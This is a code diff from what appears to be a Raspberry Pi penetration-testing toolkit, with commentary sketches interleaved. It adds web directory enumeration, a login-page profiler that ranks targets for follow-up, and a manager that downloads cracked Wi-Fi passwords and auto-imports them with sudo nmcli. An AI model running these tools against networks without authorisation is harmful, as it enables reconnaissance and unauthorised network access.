if process.stdout:
process.stdout.close()
except Exception:
pass
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
except Exception as e:
logger.error(f"General execution error: {e}")
return "failed"
# -------------------- CLI mode (debug/manual) --------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration (CLI)...")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"Enumeration interrupted for {ip}:{port}.")
break
else:
logger.failed(f"Enumeration failed for {ip}:{port}.")
logger.info("Web directory enumeration completed.")
except Exception as e:
logger.error(f"General execution error: {e}")
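The status-policy expansion performed by `_normalize_status_policy()` (plain integers, "5xx" wildcards, "a-b" ranges) is easiest to verify in isolation. Below is a minimal sketch with the same semantics, minus the per-token validation and warning logs of the real function.

```python
def normalize_status_policy(policy):
    """Expand a mixed UI policy (ints, "5xx" wildcards, "a-b" ranges)
    into a flat set of HTTP status codes, as web_enum.py does."""
    codes = set()
    for item in policy:
        if isinstance(item, int):
            if 100 <= item <= 599:
                codes.add(item)
            continue
        s = str(item).strip().lower()
        if s.endswith("xx") and len(s) == 3 and s[0].isdigit():
            base = int(s[0]) * 100
            codes.update(range(base, base + 100))  # e.g. "5xx" -> 500..599
        elif "-" in s:
            a, b = (int(x) for x in s.split("-", 1))
            codes.update(range(max(100, a), min(599, b) + 1))
        else:
            codes.add(int(s))
    return codes
```

For example, `[200, "5xx", "301-303"]` expands to 200, the three redirect codes, and the full 500..599 block, which the streaming loop then matches against each parsed Gobuster status.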

View File

@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_login_profiler.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebLoginProfiler"
b_module = "web_login_profiler"
b_status = "WebLoginProfiler"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 55
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
"/",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
"/robots.txt",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
# Very cheap login form heuristics
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
# Rate limit / lockout hints
rate_limited = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
cookie_names = []
if set_cookie:
# Parse only cookie names cheaply
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
framework_hints = []
for cn in cookie_names:
l = cn.lower()
if l in {"csrftoken", "sessionid"}:
framework_hints.append("django")
elif l in {"laravel_session", "xsrf-token"}:
framework_hints.append("laravel")
elif l == "phpsessid":
framework_hints.append("php")
elif "wordpress" in l:
framework_hints.append("wordpress")
server = h.get("server", "")
powered = h.get("x-powered-by", "")
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"rate_limited_hint": bool(rate_limited),
"server": server,
"x_powered_by": powered,
"cookie_names": cookie_names[:12],
"framework_hints": sorted(set(framework_hints))[:6],
}
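The heuristics above can be exercised in isolation. The following is a standalone sketch that mirrors the two strongest signals (HTTP Basic/Digest challenges and form-plus-password-field detection); the function name is illustrative and the real `_detect_signals` additionally checks CSRF markers, rate-limit headers, and cookie-based framework hints:

```python
def detect_login_signals(status, headers, body_snippet):
    """Mirror of the auth-challenge and login-form heuristics above."""
    h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
    www = h.get("www-authenticate", "").lower()
    auth_type = None
    if status == 401 and "basic" in www:
        auth_type = "basic"
    elif status == 401 and "digest" in www:
        auth_type = "digest"
    snippet = (body_snippet or "").lower()
    has_password = 'type="password"' in snippet or "type='password'" in snippet
    looks_like_login = ("<form" in snippet and has_password) or "login" in snippet
    return {"auth_type": auth_type, "looks_like_login": looks_like_login}

# A Basic-auth challenge and a plain HTML login form both register as login surfaces.
print(detect_login_signals(401, {"WWW-Authenticate": 'Basic realm="router"'}, ""))
print(detect_login_signals(200, {}, '<form><input type="password"></form>'))
```

Because both checks operate on a lowercase 64KB body snippet, the cost stays constant regardless of the real page size.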
class WebLoginProfiler:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _db_upsert(self, *, mac: str, ip: str, hostname: str, port: int, path: str,
status: int, size: int, response_ms: int, content_type: str,
method: str, user_agent: str, headers_json: str):
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'login_profiler', ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
method or "GET",
user_agent or "",
headers_json or "",
),
)
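The `INSERT ... ON CONFLICT ... DO UPDATE` statement above keeps exactly one row per `(mac_address, ip, port, directory)` key and refreshes it on every re-probe. A minimal in-memory sketch of the same upsert pattern (simplified schema, illustrative data):

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("""
    CREATE TABLE webenum (
        ip TEXT, port INTEGER, directory TEXT, status INTEGER,
        UNIQUE(ip, port, directory)
    )
""")
upsert = """
    INSERT INTO webenum (ip, port, directory, status) VALUES (?, ?, ?, ?)
    ON CONFLICT(ip, port, directory) DO UPDATE SET status = excluded.status
"""
con.execute(upsert, ("10.0.0.5", 80, "/login", 200))
con.execute(upsert, ("10.0.0.5", 80, "/login", 401))  # same key: row updated, not duplicated
rows = con.execute("SELECT COUNT(*), MAX(status) FROM webenum").fetchone()
print(rows)  # (1, 401)
```

The `ON CONFLICT ... DO UPDATE` form requires SQLite 3.24+, which any recent Python build bundles; the conflict target must match a `UNIQUE` constraint, as it does here.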
def _fetch(self, *, ip: str, port: int, scheme: str, path: str, timeout_s: float,
user_agent: str) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
body_snip = ""
headers_out: Dict[str, str] = {}
status = 0
size = 0
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
# Read only a small chunk (Pi-friendly) for fingerprinting.
chunk = resp.read(65536) # 64KB
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebProfiler/1.0"))
paths = getattr(self.shared_data, "web_login_profiler_paths", None) or DEFAULT_PATHS
if not isinstance(paths, list):
paths = DEFAULT_PATHS
self.shared_data.bjorn_orch_status = "WebLoginProfiler"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
found_login = 0
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
)
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
if signals.get("looks_like_login") or signals.get("auth_type"):
found_login += 1
headers_payload = {
"signals": signals,
"sample": {
"status": status,
"content_type": ctype,
},
}
try:
headers_json = json.dumps(headers_payload, ensure_ascii=True)
except Exception:
headers_json = ""
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
method="GET",
user_agent=user_agent,
headers_json=headers_json,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
progress.set_complete()
# "success" means: profiler ran; not that a login exists.
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""


@@ -0,0 +1,233 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import time
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_surface_mapper.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebSurfaceMapper"
b_module = "web_surface_mapper"
b_status = "WebSurfaceMapper"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_success:WebLoginProfiler"
b_priority = 45
b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _safe_json_loads(s: str) -> dict:
try:
return json.loads(s) if s else {}
except Exception:
return {}
def _score_signals(signals: dict) -> int:
"""
Heuristic risk score 0..100.
This is not an "attack recommendation"; it's a prioritization for recon.
"""
if not isinstance(signals, dict):
return 0
score = 0
auth = str(signals.get("auth_type") or "").lower()
if auth in {"basic", "digest"}:
score += 45
if bool(signals.get("looks_like_login")):
score += 35
if bool(signals.get("has_csrf")):
score += 10
if bool(signals.get("rate_limited_hint")):
# Defensive signal: reduces priority for noisy follow-ups.
score -= 25
hints = signals.get("framework_hints") or []
if isinstance(hints, list) and hints:
score += min(10, 3 * len(hints))
return max(0, min(100, int(score)))
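The scoring weights can be checked with a couple of worked inputs. This standalone sketch mirrors `_score_signals` (reimplemented here so the snippet runs on its own):

```python
def score_signals(signals):
    """Mirror of the 0..100 prioritization heuristic above."""
    score = 0
    if str(signals.get("auth_type") or "").lower() in {"basic", "digest"}:
        score += 45
    if signals.get("looks_like_login"):
        score += 35
    if signals.get("has_csrf"):
        score += 10
    if signals.get("rate_limited_hint"):
        score -= 25  # defensive control lowers recon priority
    hints = signals.get("framework_hints") or []
    score += min(10, 3 * len(hints))
    return max(0, min(100, score))

print(score_signals({"auth_type": "basic", "looks_like_login": True}))       # 45 + 35 = 80
print(score_signals({"looks_like_login": True, "rate_limited_hint": True}))  # 35 - 25 = 10
```

Note the asymmetry: a rate-limit hint subtracts 25 points, so a login form behind visible throttling scores well below an unprotected Basic-auth endpoint.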
class WebSurfaceMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
def _db_upsert_summary(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
scheme: str,
summary: dict,
):
directory = "/__surface_summary__"
payload = json.dumps(summary, ensure_ascii=True)
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'surface_mapper', 'SUMMARY', '', ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
directory,
200,
len(payload),
0,
"application/json",
payload,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
try:
port_i = int(port) if str(port).strip() else 80
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
self.shared_data.bjorn_orch_status = "WebSurfaceMapper"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "phase": "score"}
# Load recent profiler rows for this target.
rows: List[Dict[str, Any]] = []
try:
rows = self.shared_data.db.query(
"""
SELECT directory, status, content_type, headers, response_time, last_seen
FROM webenum
WHERE mac_address=? AND ip=? AND port=? AND is_active=1 AND tool='login_profiler'
ORDER BY last_seen DESC
""",
(mac or "", ip, int(port_i)),
)
except Exception as e:
logger.error(f"DB query failed (webenum login_profiler): {e}")
rows = []
progress = ProgressTracker(self.shared_data, max(1, len(rows)))
scored: List[Tuple[int, str, int, str, dict]] = []
try:
for r in rows:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
directory = str(r.get("directory") or "/")
status = int(r.get("status") or 0)
ctype = str(r.get("content_type") or "")
h = _safe_json_loads(str(r.get("headers") or ""))
signals = h.get("signals") if isinstance(h, dict) else {}
score = _score_signals(signals if isinstance(signals, dict) else {})
scored.append((score, directory, status, ctype, signals if isinstance(signals, dict) else {}))
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": directory,
"score": str(score),
}
progress.advance(1)
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:5]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored))) if scored else 0
top_path = top[0][1] if top else ""
top_score = top[0][0] if top else 0
summary = {
"ip": ip,
"port": int(port_i),
"scheme": scheme,
"count_profiled": int(len(rows)),
"avg_score": int(avg),
"top": [
{"score": int(s), "path": p, "status": int(st), "content_type": ct, "signals": sig}
for (s, p, st, ct, sig) in top
],
"ts_epoch": int(time.time()),
}
try:
self._db_upsert_summary(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
scheme=scheme,
summary=summary,
)
except Exception as e:
logger.error(f"DB upsert summary failed: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"count": str(len(rows)),
"top_path": top_path,
"top_score": str(top_score),
"avg_score": str(avg),
}
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

actions/wpasec_potfiles.py (new file, 319 lines)

@@ -0,0 +1,319 @@
# wpasec_potfiles.py
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
import os
import json
import glob
import argparse
import requests
import subprocess
from datetime import datetime
import logging
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
b_class = "WPAsecPotfileManager"
b_module = "wpasec_potfiles"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "wifi"
b_name = "WPAsec Potfile Manager"
b_description = (
"Download, clean, import, or erase Wi-Fi networks from WPAsec potfiles. "
"Options: download (default if API key is set), clean, import, erase."
)
b_author = "Infinition"
b_version = "1.0.0"
b_icon = f"/actions_icons/{b_class}.png"
b_docs_url = "https://wpa-sec.stanev.org/?api"
b_args = {
"key": {
"type": "text",
"label": "API key (WPAsec)",
"placeholder": "wpa-sec api key",
"secret": True,
"help": "API key used to download the potfile. If empty, the saved key is reused."
},
"directory": {
"type": "text",
"label": "Potfiles directory",
"default": "/home/bjorn/Bjorn/data/input/potfiles",
"placeholder": "/path/to/potfiles",
"help": "Directory containing/receiving .pot / .potfile files."
},
"clean": {
"type": "checkbox",
"label": "Clean potfiles directory",
"default": False,
"help": "Delete all files in the potfiles directory."
},
"import_potfiles": {
"type": "checkbox",
"label": "Import potfiles into NetworkManager",
"default": False,
"help": "Add Wi-Fi networks found in potfiles via nmcli (avoiding duplicates)."
},
"erase": {
"type": "checkbox",
"label": "Erase Wi-Fi connections from potfiles",
"default": False,
"help": "Delete via nmcli the Wi-Fi networks listed in potfiles (avoiding duplicates)."
}
}
b_examples = [
{"directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"key": "YOUR_API_KEY_HERE", "directory": "/home/bjorn/Bjorn/data/input/potfiles"},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "import_potfiles": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "erase": True},
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True, "import_potfiles": True},
]
def compute_dynamic_b_args(base: dict) -> dict:
"""
Enrich dynamic UI arguments:
- Pre-fill the API key if previously saved.
- Show info about the number of potfiles in the chosen directory.
"""
d = dict(base or {})
try:
settings_path = os.path.join(
os.path.expanduser("~"), ".settings_bjorn", "wpasec_settings.json"
)
if os.path.exists(settings_path):
with open(settings_path, "r", encoding="utf-8") as f:
saved = json.load(f)
saved_key = (saved or {}).get("api_key")
if saved_key and not d.get("key", {}).get("default"):
d.setdefault("key", {}).setdefault("default", saved_key)
d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"
except Exception:
pass
try:
directory = d.get("directory", {}).get("default") or "/home/bjorn/Bjorn/data/input/potfiles"
exists = os.path.isdir(directory)
count = 0
if exists:
count = len(glob.glob(os.path.join(directory, "*.pot"))) + \
len(glob.glob(os.path.join(directory, "*.potfile")))
extra = f" | Found: {count} potfile(s)" if exists else " | (directory does not exist yet)"
d["directory"]["help"] = (d["directory"].get("help") or "") + extra
except Exception:
pass
return d
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
class WPAsecPotfileManager:
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
def __init__(self, shared_data):
"""
Orchestrator always passes shared_data.
Even if unused here, we store it for compatibility.
"""
self.shared_data = shared_data
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
# --- Orchestrator entry point ---
def execute(self, ip=None, port=None, row=None, status_key=None):
"""
Entry point for orchestrator.
By default: download latest potfile if API key is available.
"""
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
self.shared_data.comment_params = {"ip": ip, "port": port}
api_key = self.load_api_key()
if api_key:
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
return "success"
else:
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
return "failed"
# --- API Key Handling ---
def save_api_key(self, api_key: str):
"""Save the API key locally."""
try:
os.makedirs(self.DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {"api_key": api_key}
with open(self.SETTINGS_FILE, "w") as file:
json.dump(settings, file)
logging.info(f"API key saved to {self.SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save API key: {e}")
def load_api_key(self):
"""Load the API key from local storage."""
if os.path.exists(self.SETTINGS_FILE):
try:
with open(self.SETTINGS_FILE, "r") as file:
settings = json.load(file)
return settings.get("api_key")
except Exception as e:
logging.error(f"Failed to load API key: {e}")
return None
# --- Actions ---
def download_potfile(self, save_dir, api_key):
"""Download the potfile from WPAsec."""
try:
cookies = {"key": api_key}
logging.info(f"Downloading potfile from: {self.DOWNLOAD_URL}")
            response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True, timeout=60)  # avoid hanging forever on a dead connection
response.raise_for_status()
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = os.path.join(save_dir, f"potfile_{ts}.pot")
os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file:
for chunk in response.iter_content(chunk_size=8192):
file.write(chunk)
            logging.info(f"Potfile saved to: {filename}")
except requests.exceptions.RequestException as e:
logging.error(f"Failed to download potfile: {e}")
except Exception as e:
logging.error(f"Unexpected error: {e}")
def clean_directory(self, directory):
"""Delete all potfiles in the given directory."""
try:
if os.path.exists(directory):
logging.info(f"Cleaning directory: {directory}")
for file in os.listdir(directory):
file_path = os.path.join(directory, file)
if os.path.isfile(file_path):
os.remove(file_path)
logging.info(f"Deleted: {file_path}")
else:
logging.info(f"Directory does not exist: {directory}")
except Exception as e:
logging.error(f"Failed to clean directory {directory}: {e}")
def import_potfiles(self, directory):
"""Import potfiles into NetworkManager using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_added = []
DEFAULT_PRIORITY = 5
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, password = self._parse_potfile_line(line)
if not ssid or not password or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "add", "type", "wifi",
"con-name", ssid, "ifname", "*", "ssid", ssid,
"wifi-sec.key-mgmt", "wpa-psk", "wifi-sec.psk", password,
"connection.autoconnect", "yes",
"connection.autoconnect-priority", str(DEFAULT_PRIORITY)],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_added.append(ssid)
logging.info(f"Imported network {ssid}")
except subprocess.CalledProcessError as e:
logging.error(f"Failed to import {ssid}: {e.stderr.strip()}")
logging.info(f"Total imported: {networks_added}")
except Exception as e:
logging.error(f"Unexpected error while importing: {e}")
def erase_networks(self, directory):
"""Erase Wi-Fi connections listed in potfiles using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_removed = []
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, _ = self._parse_potfile_line(line)
if not ssid or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "delete", "id", ssid],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_removed.append(ssid)
logging.info(f"Deleted network {ssid}")
except subprocess.CalledProcessError as e:
logging.warning(f"Failed to delete {ssid}: {e.stderr.strip()}")
logging.info(f"Total deleted: {networks_removed}")
except Exception as e:
logging.error(f"Unexpected error while erasing: {e}")
# --- Helpers ---
def _parse_potfile_line(self, line: str):
"""Parse a potfile line into (ssid, password)."""
ssid, password = None, None
if line.startswith("$WPAPSK$") and "#" in line:
try:
ssid_hash, password = line.split(":", 1)
ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
except ValueError:
return None, None
elif len(line.split(":")) == 4:
try:
_, _, ssid, password = line.split(":")
except ValueError:
return None, None
return ssid, password
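The two line formats handled above can be seen with sample data. This is a standalone mirror of `_parse_potfile_line` (function name illustrative; the sample lines are made up, not real potfile contents):

```python
def parse_potfile_line(line):
    """Mirror of the parser above: $WPAPSK$essid#... lines and 4-field colon lines."""
    if line.startswith("$WPAPSK$") and "#" in line:
        ssid_hash, password = line.split(":", 1)
        ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
        return ssid, password
    parts = line.split(":")
    if len(parts) == 4:
        _, _, ssid, password = parts
        return ssid, password
    return None, None

print(parse_potfile_line("$WPAPSK$HomeNet#abcdef:secretpass"))   # John-the-Ripper style
print(parse_potfile_line("aabbcc:112233:CafeWifi:letmein"))      # 4-field colon style
print(parse_potfile_line("not a potfile line"))                  # rejected
```

Lines that match neither shape return `(None, None)`, which the import/erase loops skip, so malformed entries never reach `nmcli`.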
# --- CLI ---
def run(self, argv=None):
parser = argparse.ArgumentParser(description="Manage WPAsec potfiles (download, clean, import, erase).")
parser.add_argument("-k", "--key", help="API key for WPAsec (saved locally after first use).")
parser.add_argument("-d", "--directory", default=self.DEFAULT_SAVE_DIR, help="Directory for potfiles.")
parser.add_argument("-c", "--clean", action="store_true", help="Clean the potfiles directory.")
parser.add_argument("-a", "--import-potfiles", action="store_true", help="Import potfiles into NetworkManager.")
parser.add_argument("-e", "--erase", action="store_true", help="Erase Wi-Fi connections from potfiles.")
args = parser.parse_args(argv)
api_key = args.key
if api_key:
self.save_api_key(api_key)
else:
api_key = self.load_api_key()
if args.clean:
self.clean_directory(args.directory)
if args.import_potfiles:
self.import_potfiles(args.directory)
if args.erase:
self.erase_networks(args.directory)
if api_key and not args.clean and not args.import_potfiles and not args.erase:
self.download_potfile(args.directory, api_key)
if __name__ == "__main__":
WPAsecPotfileManager(shared_data=None).run()

actions/yggdrasil_mapper.py (new file, 847 lines)

@@ -0,0 +1,847 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
yggdrasil_mapper.py -- Network topology mapper (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1: Traceroute via scapy ICMP (fallback: subprocess traceroute) to discover
the routing path to the target IP. Records hop IPs and RTT per hop.
- Phase 2: Service enrichment -- reads existing port data from DB hosts table and
optionally verifies a handful of key ports with TCP connect probes.
- Phase 3: Builds a topology graph data structure (nodes + edges + metadata).
- Phase 4: Aggregates with topology data from previous runs (merge / deduplicate).
- Phase 5: Saves the combined topology as JSON to data/output/topology/.
No matplotlib or networkx dependency -- pure JSON output.
Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import os
import socket
import time
from datetime import datetime
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="yggdrasil_mapper.py", level=logging.DEBUG)
# Silence scapy logging before import
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy.interactive").setLevel(logging.ERROR)
logging.getLogger("scapy.loading").setLevel(logging.ERROR)
_SCAPY_AVAILABLE = False
try:
from scapy.all import IP, ICMP, sr1, conf as scapy_conf
scapy_conf.verb = 0
_SCAPY_AVAILABLE = True
except ImportError:
logger.warning("scapy not available; falling back to subprocess traceroute")
except Exception as exc:
logger.warning(f"scapy import error ({exc}); falling back to subprocess traceroute")
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "YggdrasilMapper"
b_module = "yggdrasil_mapper"
b_status = "yggdrasil_mapper"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 10
b_cooldown = 3600
b_rate_limit = "3/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 6
b_risk_level = "low"
b_enabled = 1
